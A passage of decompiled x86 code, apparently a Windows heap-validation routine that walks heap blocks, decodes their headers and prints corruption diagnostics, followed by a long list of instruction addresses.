											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
											__eflags =  *_t671;
										}
										_t671 = _t671 + _a4;
										__eflags = _t671;
										goto L174;
									}
									_t401 =  *(_t671 + 0x1c);
									__eflags = _t401 - _t532;
									if(_t401 == _t532) {
										_t402 =  *_t671 & 0x0000ffff;
										__eflags = _t671 + _t402 * 8 -  *((intOrPtr*)(_t570 + 0x28));
										if(_t671 + _t402 * 8 ==  *((intOrPtr*)(_t570 + 0x28))) {
											__eflags =  *(_t670 + 0x4c) - _t532;
											if( *(_t670 + 0x4c) != _t532) {
												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
												__eflags =  *_t671;
											}
											L203:
											return 1;
										}
										_t409 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *((intOrPtr*)(_t409 + 0xc)) - _t532;
										if( *((intOrPtr*)(_t409 + 0xc)) == _t532) {
											_push("HEAP: ");
											E0094373B();
										} else {
											E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *((intOrPtr*)(_a8 + 0x28)));
										_push(_t671);
										_push("Heap block at %p is not last block in segment (%p)\n");
										L195:
										E0094373B();
										goto L183;
									}
									_v36 = _v36 + 1;
									_v32 = _v32 + (_t401 >> 0xc);
									__eflags =  *(_t670 + 0x4c) - _t532;
									if( *(_t670 + 0x4c) != _t532) {
										 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
										 *_t671 =  *_t671 ^  *(_t670 + 0x50);
										__eflags =  *_t671;
									}
									_t671 = _t671 +  *(_t671 + 0x1c) + 0x20;
									__eflags = _t671 -  *((intOrPtr*)(_t570 + 0x28));
									if(_t671 ==  *((intOrPtr*)(_t570 + 0x28))) {
										L170:
										_v24 = _t532;
										goto L174;
									} else {
										__eflags =  *(_t670 + 0x4c) - _t532;
										if( *(_t670 + 0x4c) != _t532) {
											 *_t671 =  *_t671 ^  *(_t670 + 0x50);
											__eflags =  *(_t671 + 3) - ( *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671);
											if(__eflags != 0) {
												_push(_t532);
												_push(_t671);
												_push(_t670);
												E0099F8EE(_t532, _t670, _t671, __eflags);
											}
										}
										__eflags =  *(_t671 + 4) ^  *(_t670 + 0x54);
										if(( *(_t671 + 4) ^  *(_t670 + 0x54)) != 0) {
											_t423 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
											__eflags =  *((intOrPtr*)(_t423 + 0xc)) - _t532;
											if( *((intOrPtr*)(_t423 + 0xc)) == _t532) {
												_push("HEAP: ");
												E0094373B();
											} else {
												E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
											}
											_push( *(_t671 + 4) & 0x0000ffff ^  *(_t670 + 0x54) & 0x0000ffff);
											_push(_t671);
											_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
											goto L195;
										} else {
											__eflags =  *(_t670 + 0x4c) - _t532;
											if( *(_t670 + 0x4c) != _t532) {
												 *(_t671 + 3) =  *(_t671 + 2) ^  *(_t671 + 1) ^  *_t671;
												 *_t671 =  *_t671 ^  *(_t670 + 0x50);
												__eflags =  *_t671;
											}
											goto L170;
										}
									}
								}
							}
							__eflags = _t380 & 0x00000004;
							if((_t380 & 0x00000004) == 0) {
								goto L154;
							}
							_t534 = _a4 + 0xfffffff0;
							__eflags = _t380 & 0x00000002;
							if((_t380 & 0x00000002) != 0) {
								__eflags = _t534 - 4;
								if(_t534 > 4) {
									_t534 = _t534 - 4;
									__eflags = _t534;
								}
							}
							__eflags = _t380 & 0x00000008;
							if((_t380 & 0x00000008) == 0) {
								_t450 = E00928950(_t671 + 0x10, _t534, 0xfeeefeee);
								_v40 = _t450;
								__eflags = _t450 - _t534;
								if(_t450 != _t534) {
									_t452 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t452 + 0xc);
									if( *(_t452 + 0xc) == 0) {
										_push("HEAP: ");
										E0094373B();
									} else {
										E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push(_t671 + 8 + _v40);
									E0094373B("Free Heap block %p modified at %p after it was freed\n", _t671);
									__eflags =  *(_t670 + 0x4c);
									goto L184;
								}
								_t532 = 0;
								__eflags = 0;
								goto L154;
							} else {
								_t535 =  *(_t671 + 0xc);
								_t463 = _t671 + 8;
								_t627 =  *_t463;
								_v12 = _t627;
								_t628 =  *((intOrPtr*)(_t627 + 4));
								_v40 = _t535;
								_t536 =  *_t535;
								__eflags = _t536 - _t628;
								if(__eflags != 0) {
									L61:
									_push(0);
									_push(_t536);
									_push(_t628);
									_push(_t463);
									_push(_t670);
									_push(0xc);
									E0099F840(_t536, _t568, _t628, _t670, _t671, __eflags);
									goto L174;
								}
								__eflags = _t536 - _t463;
								if(__eflags != 0) {
									goto L61;
								}
								_t465 =  *(_t670 + 0xb8);
								 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) - _t568;
								__eflags = _t465;
								if(_t465 == 0) {
									L58:
									_t466 = _v12;
									_t582 = _v40;
									 *_t582 = _t466;
									 *((intOrPtr*)(_t466 + 4)) = _t582;
									__eflags =  *(_t671 + 2) & 0x00000008;
									if(__eflags == 0) {
										L62:
										_t537 =  *_t671 & 0x0000ffff;
										 *(_t671 + 2) = 0;
										 *((char*)(_t671 + 7)) = 0;
										_t467 =  *(_t670 + 0xb8);
										_v20 = _t537;
										__eflags = _t467;
										if(_t467 != 0) {
											while(1) {
												__eflags = _t537 -  *((intOrPtr*)(_t467 + 4));
												if(_t537 <  *((intOrPtr*)(_t467 + 4))) {
													break;
												}
												_t583 =  *_t467;
												__eflags = _t583;
												if(_t583 == 0) {
													_t630 =  *((intOrPtr*)(_t467 + 4)) - 1;
													__eflags = _t630;
													_v28 = _t630;
													L75:
													_t584 = _t467 + 0x14;
													while(1) {
														_a4 = _t467;
														_v16 = _t630 -  *_t584;
														_t632 =  *((intOrPtr*)(_t467 + 0x18));
														_t468 =  *((intOrPtr*)(_t632 + 4));
														_v12 = _t632;
														__eflags = _t632 - _t468;
														if(_t632 != _t468) {
															goto L78;
														}
														L77:
														_v8 = _t632;
														L121:
														_t472 = _v8;
														__eflags = _t472;
														if(_t472 != 0) {
															L64:
															_t107 = _t670 + 0xc4; // 0xc5
															_t539 = _t107;
															__eflags = _t539 - _t472;
															if(_t539 == _t472) {
																L126:
																_t634 =  *(_t472 + 4);
																_t585 =  *_t634;
																__eflags = _t585 - _t472;
																if(_t585 != _t472) {
																	__eflags = 0;
																	_push(0);
																	_push(_t585);
																	_push(0);
																	_push(_t472);
																	_push(0);
																	_push(0xc);
																	E0099F840(_t539, _t585, 0, _t670, _t671, 0);
																} else {
																	_t594 = _t671 + 8;
																	 *_t594 = _t472;
																	_t594[1] = _t634;
																	 *_t634 = _t594;
																	 *(_t472 + 4) = _t594;
																}
																 *((intOrPtr*)(_t670 + 0x78)) =  *((intOrPtr*)(_t670 + 0x78)) + ( *_t671 & 0x0000ffff);
																_t475 =  *(_t670 + 0xb8);
																__eflags = _t475;
																if(_t475 == 0) {
																	L150:
																	__eflags =  *(_t670 + 0x4c);
																	if( *(_t670 + 0x4c) != 0) {
																		 *(_t671 + 3) =  *(_t671 + 1) ^  *_t671 ^  *(_t671 + 2);
																		 *_t671 =  *_t671 ^  *(_t670 + 0x50);
																	}
																	goto L174;
																} else {
																	_t586 =  *_t671 & 0x0000ffff;
																	while(1) {
																		__eflags = _t586 -  *((intOrPtr*)(_t475 + 4));
																		if(_t586 <  *((intOrPtr*)(_t475 + 4))) {
																			break;
																		}
																		_t636 =  *_t475;
																		__eflags = _t636;
																		if(_t636 == 0) {
																			_t638 =  *((intOrPtr*)(_t475 + 4)) - 1;
																			__eflags = _t638;
																			L136:
																			_t588 = _t638 -  *((intOrPtr*)(_t475 + 0x14));
																			__eflags =  *(_t475 + 8);
																			_v28 = _t588;
																			if( *(_t475 + 8) != 0) {
																				_t588 = _t588 + _t588;
																				__eflags = _t588;
																			}
																			 *((intOrPtr*)(_t475 + 0xc)) =  *((intOrPtr*)(_t475 + 0xc)) + 1;
																			_t589 = _t588 << 2;
																			_a4 = _t589;
																			_t590 =  *(_t589 +  *((intOrPtr*)(_t475 + 0x20)));
																			_v40 = _t590;
																			__eflags = _t638 -  *((intOrPtr*)(_t475 + 4)) - 1;
																			if(_t638 ==  *((intOrPtr*)(_t475 + 4)) - 1) {
																				_t207 = _t475 + 0x10;
																				 *_t207 =  *(_t475 + 0x10) + 1;
																				__eflags =  *_t207;
																			}
																			__eflags = _t590;
																			if(_t590 == 0) {
																				L147:
																				 *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t475 + 0x20)))) = _t671 + 8;
																				_t590 = _v40;
																				goto L148;
																			} else {
																				__eflags =  *(_t670 + 0x4c);
																				if( *(_t670 + 0x4c) == 0) {
																					_t643 =  *(_t590 - 8) & 0x0000ffff;
																				} else {
																					_t645 =  *(_t590 - 8);
																					__eflags =  *(_t670 + 0x4c) & _t645;
																					if(( *(_t670 + 0x4c) & _t645) != 0) {
																						_t645 = _t645 ^  *(_t670 + 0x50);
																						__eflags = _t645;
																					}
																					_t643 = _t645 & 0x0000ffff;
																				}
																				__eflags = ( *_t671 & 0x0000ffff) - (_t643 & 0x0000ffff);
																				if(( *_t671 & 0x0000ffff) - (_t643 & 0x0000ffff) > 0) {
																					L148:
																					__eflags = _t590;
																					if(_t590 == 0) {
																						_t592 = _v28;
																						_t642 =  *((intOrPtr*)(_t475 + 0x1c)) + (_t592 >> 5) * 4;
																						 *_t642 =  *_t642 | 1 << (_t592 & 0x0000001f);
																						__eflags =  *_t642;
																					}
																					goto L150;
																				} else {
																					goto L147;
																				}
																			}
																		}
																		_t475 = _t636;
																	}
																	_t638 = _t586;
																	goto L136;
																}
															}
															_t646 =  *(_t670 + 0x4c);
															while(1) {
																__eflags = _t646;
																if(_t646 == 0) {
																	_t595 =  *(_t472 - 8) & 0x0000ffff;
																} else {
																	_t597 =  *(_t472 - 8);
																	_t646 =  *(_t670 + 0x4c);
																	__eflags = _t646 & _t597;
																	if((_t646 & _t597) != 0) {
																		_t597 = _t597 ^  *(_t670 + 0x50);
																		__eflags = _t597;
																	}
																	_t595 = _t597 & 0x0000ffff;
																}
																__eflags = _v20 - (_t595 & 0x0000ffff);
																if(_v20 <= (_t595 & 0x0000ffff)) {
																	goto L126;
																}
																_t472 =  *_t472;
																__eflags = _t539 - _t472;
																if(_t539 != _t472) {
																	continue;
																}
																goto L126;
															}
															goto L126;
														}
														_t467 =  *_a4;
														_t537 = _v20;
														_t584 = _t467 + 0x14;
														_t630 =  *_t584;
														_v28 = _t630;
														_a4 = _t467;
														_v16 = _t630 -  *_t584;
														_t632 =  *((intOrPtr*)(_t467 + 0x18));
														_t468 =  *((intOrPtr*)(_t632 + 4));
														_v12 = _t632;
														__eflags = _t632 - _t468;
														if(_t632 != _t468) {
															goto L78;
														}
														goto L77;
														L78:
														_t633 =  *(_t670 + 0x4c);
														__eflags = _t633;
														if(_t633 == 0) {
															_t469 =  *(_t468 - 8) & 0x0000ffff;
														} else {
															_t514 =  *(_t468 - 8);
															_t633 =  *(_t670 + 0x4c);
															__eflags = _t514 & _t633;
															if((_t514 & _t633) != 0) {
																_t514 = _t514 ^  *(_t670 + 0x50);
																__eflags = _t514;
															}
															_t469 = _t514 & 0x0000ffff;
														}
														_t471 = _v12;
														__eflags = _t537 - (_t469 & 0x0000ffff);
														if(_t537 - (_t469 & 0x0000ffff) > 0) {
															L119:
															_v8 = _t471;
															goto L121;
														} else {
															_t486 =  *_t471 - 8;
															__eflags = _t633;
															if(_t633 == 0) {
																_t487 =  *_t486 & 0x0000ffff;
															} else {
																_t513 =  *_t486;
																_t633 =  *(_t670 + 0x4c);
																__eflags = _t513 & _t633;
																if((_t513 & _t633) != 0) {
																	_t513 = _t513 ^  *(_t670 + 0x50);
																	__eflags = _t513;
																}
																_t487 = _t513 & 0x0000ffff;
															}
															__eflags = _v20 - (_t487 & 0x0000ffff);
															if(_v20 - (_t487 & 0x0000ffff) > 0) {
																_t489 = _a4;
																__eflags =  *_t489;
																if( *_t489 != 0) {
																	L105:
																	_t490 = _a4;
																	_t549 = _v16 >> 5;
																	_v12 =  *((intOrPtr*)(_t490 + 0x1c)) + _t549 * 4;
																	_t650 = ( *((intOrPtr*)(_t490 + 4)) -  *_t584 >> 5) - 1;
																	_t498 =  !((1 << (_v16 & 0x0000001f)) - 1) &  *_v12;
																	__eflags = 1;
																	if(1 != 0) {
																		L109:
																		__eflags = _t498 & 0x0000ffff;
																		if((_t498 & 0x0000ffff) == 0) {
																			_t604 = _t498 >> 0x00000010 & 0x000000ff;
																			__eflags = _t604;
																			if(_t604 == 0) {
																				_t171 = (_t498 >> 0x18) + 0x9037f8; // 0x10008
																				_t501 = ( *_t171 & 0x000000ff) + 0x18;
																				__eflags = _t501;
																			} else {
																				_t170 = _t604 + 0x9037f8; // 0x10008
																				_t501 = ( *_t170 & 0x000000ff) + 0x10;
																			}
																		} else {
																			_t652 = _t498 & 0x000000ff;
																			__eflags = _t652;
																			if(_t652 == 0) {
																				_t169 = (_t498 >> 0x00000008 & 0x000000ff) + 0x9037f8; // 0x10008
																				_t501 = ( *_t169 & 0x000000ff) + 8;
																			} else {
																				_t168 = _t652 + 0x9037f8; // 0x10008
																				_t501 =  *_t168 & 0x000000ff;
																			}
																		}
																		_t551 = (_t549 << 5) + _t501;
																		_t502 = _a4;
																		__eflags =  *(_t502 + 8);
																		_t605 = _t551 + _t551;
																		if( *(_t502 + 8) == 0) {
																			_t605 = _t551;
																		}
																		_t471 =  *( *((intOrPtr*)(_t502 + 0x20)) + _t605 * 4);
																		goto L119;
																	} else {
																		goto L106;
																	}
																	while(1) {
																		L106:
																		__eflags = _t549 - _t650;
																		if(_t549 > _t650) {
																			break;
																		}
																		_v12 =  &(_v12[1]);
																		_t498 =  *_v12;
																		_t549 = _t549 + 1;
																		__eflags = _t498;
																		if(_t498 == 0) {
																			continue;
																		}
																		break;
																	}
																	__eflags = _t498;
																	if(_t498 == 0) {
																		_t179 =  &_v8;
																		 *_t179 = _v8 & 0x00000000;
																		__eflags =  *_t179;
																		goto L121;
																	}
																	goto L109;
																}
																__eflags = _v28 - _t489[1] - 1;
																if(_v28 != _t489[1] - 1) {
																	goto L105;
																}
																_t607 = _a4;
																__eflags =  *(_t607 + 8);
																_t511 = _v16;
																if( *(_t607 + 8) != 0) {
																	_t511 = _t511 + _t511;
																	__eflags = _t511;
																}
																_t471 =  *( *((intOrPtr*)(_t607 + 0x20)) + _t511 * 4);
																while(1) {
																	__eflags = _v12 - _t471;
																	if(_v12 == _t471) {
																		goto L121;
																	}
																	__eflags = _t633;
																	if(_t633 == 0) {
																		_t609 =  *(_t471 - 8) & 0x0000ffff;
																	} else {
																		_t611 =  *(_t471 - 8);
																		_t633 =  *(_t670 + 0x4c);
																		__eflags = _t611 & _t633;
																		if((_t611 & _t633) != 0) {
																			_t611 = _t611 ^  *(_t670 + 0x50);
																			__eflags = _t611;
																		}
																		_t609 = _t611 & 0x0000ffff;
																	}
																	__eflags = _v20 - (_t609 & 0x0000ffff);
																	if(_v20 - (_t609 & 0x0000ffff) <= 0) {
																		goto L119;
																	} else {
																		_t471 =  *_t471;
																		continue;
																	}
																	goto L105;
																}
																goto L121;
															} else {
																_t471 =  *_v12;
																goto L119;
															}
														}
													}
												}
												_t467 = _t583;
											}
											_t630 = _t537;
											_v28 = _t537;
											goto L75;
										}
										_t472 =  *(_t670 + 0xc4);
										goto L64;
									}
									_t515 = E009261FE(_t671, __eflags);
									__eflags = _t515;
									if(_t515 != 0) {
										goto L62;
									}
									E0091EE4C(_t536, _t670, _t670, _t671,  *_t671 & 0x0000ffff, 1);
									goto L174;
								}
								_t613 =  *_t671 & 0x0000ffff;
								while(1) {
									__eflags = _t613 -  *(_t465 + 4);
									if(_t613 <  *(_t465 + 4)) {
										break;
									}
									_t654 =  *_t465;
									__eflags = _t654;
									if(_t654 == 0) {
										_t536 =  *(_t465 + 4) - 1;
										__eflags = _t536;
										_a4 = _t536;
										L37:
										_t615 = _t536 -  *((intOrPtr*)(_t465 + 0x14));
										__eflags =  *(_t465 + 8);
										_v20 = _t615;
										if( *(_t465 + 8) != 0) {
											_t615 = _t615 + _t615;
											__eflags = _t615;
										}
										_t616 = _t615 << 2;
										_t656 =  *((intOrPtr*)(_t465 + 0x20)) + _t616;
										_v28 = _t616;
										 *((intOrPtr*)(_t465 + 0xc)) =  *((intOrPtr*)(_t465 + 0xc)) - 1;
										_v16 =  *_t656;
										__eflags = _t536 -  *(_t465 + 4) - 1;
										if(_t536 ==  *(_t465 + 4) - 1) {
											_t69 = _t465 + 0x10;
											 *_t69 =  *(_t465 + 0x10) - 1;
											__eflags =  *_t69;
										}
										__eflags = _v16 - _t671 + 8;
										if(_v16 != _t671 + 8) {
											goto L58;
										} else {
											__eflags =  *_t465;
											_t621 =  *(_t465 + 4);
											if( *_t465 == 0) {
												_t621 = _t621 - 1;
												__eflags = _t621;
											}
											__eflags = _a4 - _t621;
											_t622 =  *(_t671 + 8);
											if(_a4 >= _t621) {
												__eflags = _t622 -  *((intOrPtr*)(_t465 + 0x18));
												if(_t622 ==  *((intOrPtr*)(_t465 + 0x18))) {
													 *_t656 =  *_t656 & 0x00000000;
													__eflags =  *_t656;
													goto L57;
												}
												 *_t656 = _t622;
												goto L58;
											} else {
												__eflags = _t622 -  *((intOrPtr*)(_t465 + 0x18));
												if(_t622 ==  *((intOrPtr*)(_t465 + 0x18))) {
													L53:
													 *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) =  *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) & 0x00000000;
													L57:
													_t623 = _v20;
													_t519 =  *((intOrPtr*)(_t465 + 0x1c)) + (_t623 >> 5) * 4;
													 *_t519 =  *_t519 &  !(1 << (_t623 & 0x0000001f));
													__eflags =  *_t519;
													goto L58;
												}
												__eflags =  *(_t670 + 0x4c);
												if( *(_t670 + 0x4c) == 0) {
													_t664 =  *(_t622 - 8) & 0x0000ffff;
												} else {
													_t667 =  *(_t622 - 8);
													__eflags =  *(_t670 + 0x4c) & _t667;
													if(( *(_t670 + 0x4c) & _t667) != 0) {
														_t667 = _t667 ^  *(_t670 + 0x50);
														__eflags = _t667;
													}
													_t664 = _t667 & 0x0000ffff;
												}
												_t536 = ( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff);
												__eflags = ( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff);
												if(( *_t671 & 0x0000ffff) != (_t664 & 0x0000ffff)) {
													goto L53;
												} else {
													 *(_v28 +  *((intOrPtr*)(_t465 + 0x20))) = _t622;
													goto L58;
												}
											}
										}
									}
									_t465 = _t654;
								}
								_t536 = _t613;
								_a4 = _t613;
								goto L37;
							}
						}
						if(_a28 == _t532) {
							L19:
							if(( *(_t671 + 2) & 0x00000004) == 0 || E0098579A(_t568, _t670, _t671) != 0) {
								goto L155;
							} else {
								goto L183;
							}
						} else {
							if((_t380 & 0x00000002) == 0) {
								_t523 =  *(_t671 + 3) & 0xff;
							} else {
								_t523 =  *(E00922568(_t671) + 2) & 0x0000ffff;
							}
							if(_t523 == _t532) {
								goto L19;
							}
							if((_t523 & 0x00008000) == 0) {
								__eflags = _t523 & 0x00000800;
								if((_t523 & 0x00000800) != 0) {
									goto L19;
								}
								__eflags = _t523 -  *((intOrPtr*)(_t670 + 0x88));
								if(_t523 >=  *((intOrPtr*)(_t670 + 0x88))) {
									goto L19;
								}
								_t626 = _a28;
								L18:
								_t568 =  *_t671 & 0x0000ffff;
								 *((intOrPtr*)(_t626 + (_t523 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t626 + (_t523 & 0x0000ffff) * 4)) + ( *_t671 & 0x0000ffff);
								goto L19;
							}
							_t523 = _t523 & 0x00007fff;
							_t568 = 0x81;
							if(_t523 >= 0x81) {
								goto L19;
							} else {
								_t626 = _a32;
								goto L18;
							}
						}
						L174:
						__eflags = _t671 -  *((intOrPtr*)(_a8 + 0x28));
					} while (__eflags < 0);
					_t671 = _a8;
					_t339 = 0;
					__eflags = 0;
					goto L176;
				}
			}














































































































                                                0x0099fde7
                                                0x0099fdea
                                                0x0099fded
                                                0x0099fdf0
                                                0x0099fdf3
                                                0x0099fdf9
                                                0x009a0465
                                                0x009a0465
                                                0x009a0468
                                                0x009a046b
                                                0x009a06a2
                                                0x009a06a5
                                                0x009a06a8
                                                0x00000000
                                                0x00000000
                                                0x009a06b5
                                                0x009a06b8
                                                0x009a06bb
                                                0x009a06dd
                                                0x009a06e2
                                                0x009a06bd
                                                0x009a06d5
                                                0x009a06da
                                                0x009a06e8
                                                0x009a06e9
                                                0x009a06ec
                                                0x009a06ed
                                                0x009a0695
                                                0x009a0695
                                                0x00000000
                                                0x009a069a
                                                0x009a0478
                                                0x009a047b
                                                0x009a047e
                                                0x009a0680
                                                0x009a0685
                                                0x009a0484
                                                0x009a049c
                                                0x009a04a1
                                                0x009a068b
                                                0x009a068c
                                                0x009a068f
                                                0x009a0690
                                                0x00000000
                                                0x0099fdff
                                                0x0099fdff
                                                0x0099fe02
                                                0x0099fe05
                                                0x0099fe07
                                                0x0099fe0c
                                                0x0099fe11
                                                0x0099fe1b
                                                0x0099fe1e
                                                0x0099fe20
                                                0x0099fe21
                                                0x0099fe22
                                                0x0099fe23
                                                0x0099fe23
                                                0x0099fe1e
                                                0x0099fe34
                                                0x009a04ad
                                                0x009a04b0
                                                0x009a04b3
                                                0x009a04d5
                                                0x009a04da
                                                0x009a04b5
                                                0x009a04cd
                                                0x009a04d2
                                                0x009a04e8
                                                0x009a04ed
                                                0x009a04ed
                                                0x009a04ef
                                                0x009a04f6
                                                0x009a04fe
                                                0x009a04fe
                                                0x009a0501
                                                0x009a0501
                                                0x009a050b
                                                0x009a0511
                                                0x009a0511
                                                0x009a0513
                                                0x00000000
                                                0x009a0513
                                                0x0099fe3a
                                                0x0099fe40
                                                0x0099fe43
                                                0x0099fe4b
                                                0x0099fe4e
                                                0x0099fe53
                                                0x0099fece
                                                0x0099fed2
                                                0x009a0383
                                                0x009a0386
                                                0x009a038b
                                                0x009a038e
                                                0x009a038e
                                                0x009a0390
                                                0x009a0390
                                                0x009a0393
                                                0x009a0395
                                                0x009a03ad
                                                0x009a0397
                                                0x009a03a6
                                                0x009a03a6
                                                0x009a03af
                                                0x009a03b2
                                                0x009a03b4
                                                0x009a0576
                                                0x009a0579
                                                0x009a057c
                                                0x009a059e
                                                0x009a05a3
                                                0x009a057e
                                                0x009a0596
                                                0x009a059b
                                                0x009a05ad
                                                0x009a05ae
                                                0x009a05af
                                                0x00000000
                                                0x009a03ba
                                                0x009a03ba
                                                0x009a03be
                                                0x009a043c
                                                0x009a043f
                                                0x009a0449
                                                0x009a044f
                                                0x009a044f
                                                0x009a044f
                                                0x009a0451
                                                0x009a0451
                                                0x00000000
                                                0x009a0451
                                                0x009a03c0
                                                0x009a03c3
                                                0x009a03c5
                                                0x009a05c1
                                                0x009a05c7
                                                0x009a05ca
                                                0x009a0613
                                                0x009a0616
                                                0x009a0620
                                                0x009a0626
                                                0x009a0626
                                                0x009a0626
                                                0x009a0628
                                                0x00000000
                                                0x009a0628
                                                0x009a05d2
                                                0x009a05d5
                                                0x009a05d8
                                                0x009a05fa
                                                0x009a05ff
                                                0x009a05da
                                                0x009a05f2
                                                0x009a05f7
                                                0x009a0608
                                                0x009a060b
                                                0x009a060c
                                                0x009a05b4
                                                0x009a05b4
                                                0x00000000
                                                0x009a05b9
                                                0x009a03cb
                                                0x009a03d1
                                                0x009a03d4
                                                0x009a03d7
                                                0x009a03e1
                                                0x009a03e7
                                                0x009a03e7
                                                0x009a03e7
                                                0x009a03ec
                                                0x009a03f0
                                                0x009a03f3
                                                0x009a0437
                                                0x009a0437
                                                0x00000000
                                                0x009a03f5
                                                0x009a03f5
                                                0x009a03f8
                                                0x009a03fd
                                                0x009a0407
                                                0x009a040a
                                                0x009a040c
                                                0x009a040d
                                                0x009a040e
                                                0x009a040f
                                                0x009a040f
                                                0x009a040a
                                                0x009a0418
                                                0x009a041c
                                                0x009a0637
                                                0x009a063a
                                                0x009a063d
                                                0x009a065f
                                                0x009a0664
                                                0x009a063f
                                                0x009a0657
                                                0x009a065c
                                                0x009a0674
                                                0x009a0675
                                                0x009a0676
                                                0x00000000
                                                0x009a0422
                                                0x009a0422
                                                0x009a0425
                                                0x009a042f
                                                0x009a0435
                                                0x009a0435
                                                0x009a0435
                                                0x00000000
                                                0x009a0425
                                                0x009a041c
                                                0x009a03f3
                                                0x009a03b4
                                                0x0099fed8
                                                0x0099feda
                                                0x00000000
                                                0x00000000
                                                0x0099fee3
                                                0x0099fee6
                                                0x0099fee8
                                                0x0099feea
                                                0x0099feed
                                                0x0099feef
                                                0x0099feef
                                                0x0099feef
                                                0x0099feed
                                                0x0099fef2
                                                0x0099fef4
                                                0x009a0371
                                                0x009a0376
                                                0x009a0379
                                                0x009a037b
                                                0x009a0520
                                                0x009a0523
                                                0x009a0527
                                                0x009a0549
                                                0x009a054e
                                                0x009a0529
                                                0x009a0541
                                                0x009a0546
                                                0x009a055b
                                                0x009a0562
                                                0x009a056a
                                                0x00000000
                                                0x009a056a
                                                0x009a0381
                                                0x009a0381
                                                0x00000000
                                                0x0099fefa
                                                0x0099fefa
                                                0x0099fefd
                                                0x0099ff00
                                                0x0099ff02
                                                0x0099ff05
                                                0x0099ff08
                                                0x0099ff0b
                                                0x0099ff0d
                                                0x0099ff0f
                                                0x009a002b
                                                0x009a002b
                                                0x009a002d
                                                0x009a002e
                                                0x009a002f
                                                0x009a0030
                                                0x009a0031
                                                0x009a0033
                                                0x00000000
                                                0x009a0033
                                                0x0099ff15
                                                0x0099ff17
                                                0x00000000
                                                0x00000000
                                                0x0099ff1d
                                                0x0099ff23
                                                0x0099ff26
                                                0x0099ff28
                                                0x0099fffb
                                                0x0099fffb
                                                0x0099fffe
                                                0x009a0001
                                                0x009a0003
                                                0x009a0006
                                                0x009a000a
                                                0x009a003d
                                                0x009a003d
                                                0x009a0040
                                                0x009a0044
                                                0x009a0048
                                                0x009a004e
                                                0x009a0051
                                                0x009a0053
                                                0x009a0091
                                                0x009a0091
                                                0x009a0094
                                                0x00000000
                                                0x00000000
                                                0x009a0089
                                                0x009a008b
                                                0x009a008d
                                                0x009a00a0
                                                0x009a00a0
                                                0x009a00a1
                                                0x009a00a4
                                                0x009a00a4
                                                0x009a00a7
                                                0x009a00a9
                                                0x009a00ac
                                                0x009a00af
                                                0x009a00b2
                                                0x009a00b5
                                                0x009a00b8
                                                0x009a00ba
                                                0x00000000
                                                0x00000000
                                                0x009a00bc
                                                0x009a00bc
                                                0x009a023c
                                                0x009a023c
                                                0x009a023f
                                                0x009a0241
                                                0x009a005b
                                                0x009a005b
                                                0x009a005b
                                                0x009a0061
                                                0x009a0063
                                                0x009a0272
                                                0x009a0272
                                                0x009a0275
                                                0x009a0277
                                                0x009a0279
                                                0x009a028a
                                                0x009a028c
                                                0x009a028d
                                                0x009a028e
                                                0x009a028f
                                                0x009a0290
                                                0x009a0291
                                                0x009a0293
                                                0x009a027b
                                                0x009a027b
                                                0x009a027e
                                                0x009a0280
                                                0x009a0283
                                                0x009a0285
                                                0x009a0285
                                                0x009a029b
                                                0x009a029e
                                                0x009a02a4
                                                0x009a02a6
                                                0x009a0348
                                                0x009a0348
                                                0x009a034c
                                                0x009a035a
                                                0x009a0360
                                                0x009a0360
                                                0x00000000
                                                0x009a02ac
                                                0x009a02ac
                                                0x009a02b9
                                                0x009a02b9
                                                0x009a02bc
                                                0x00000000
                                                0x00000000
                                                0x009a02b1
                                                0x009a02b3
                                                0x009a02b5
                                                0x009a02c5
                                                0x009a02c5
                                                0x009a02c6
                                                0x009a02c8
                                                0x009a02cb
                                                0x009a02cf
                                                0x009a02d2
                                                0x009a02d4
                                                0x009a02d4
                                                0x009a02d4
                                                0x009a02d6
                                                0x009a02dc
                                                0x009a02df
                                                0x009a02e2
                                                0x009a02e9
                                                0x009a02ec
                                                0x009a02ee
                                                0x009a02f0
                                                0x009a02f0
                                                0x009a02f0
                                                0x009a02f0
                                                0x009a02f3
                                                0x009a02f5
                                                0x009a031d
                                                0x009a0326
                                                0x009a0329
                                                0x00000000
                                                0x009a02f7
                                                0x009a02f7
                                                0x009a02fb
                                                0x009a030d
                                                0x009a02fd
                                                0x009a02fd
                                                0x009a0300
                                                0x009a0303
                                                0x009a0305
                                                0x009a0305
                                                0x009a0305
                                                0x009a0308
                                                0x009a0308
                                                0x009a0319
                                                0x009a031b
                                                0x009a032c
                                                0x009a032c
                                                0x009a032e
                                                0x009a0330
                                                0x009a033b
                                                0x009a0346
                                                0x009a0346
                                                0x009a0346
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009a031b
                                                0x009a02f5
                                                0x009a02b7
                                                0x009a02b7
                                                0x009a02be
                                                0x00000000
                                                0x009a02be
                                                0x009a02a6
                                                0x009a0069
                                                0x009a006c
                                                0x009a006c
                                                0x009a006e
                                                0x009a025c
                                                0x009a0074
                                                0x009a0074
                                                0x009a0077
                                                0x009a007a
                                                0x009a007c
                                                0x009a007e
                                                0x009a007e
                                                0x009a007e
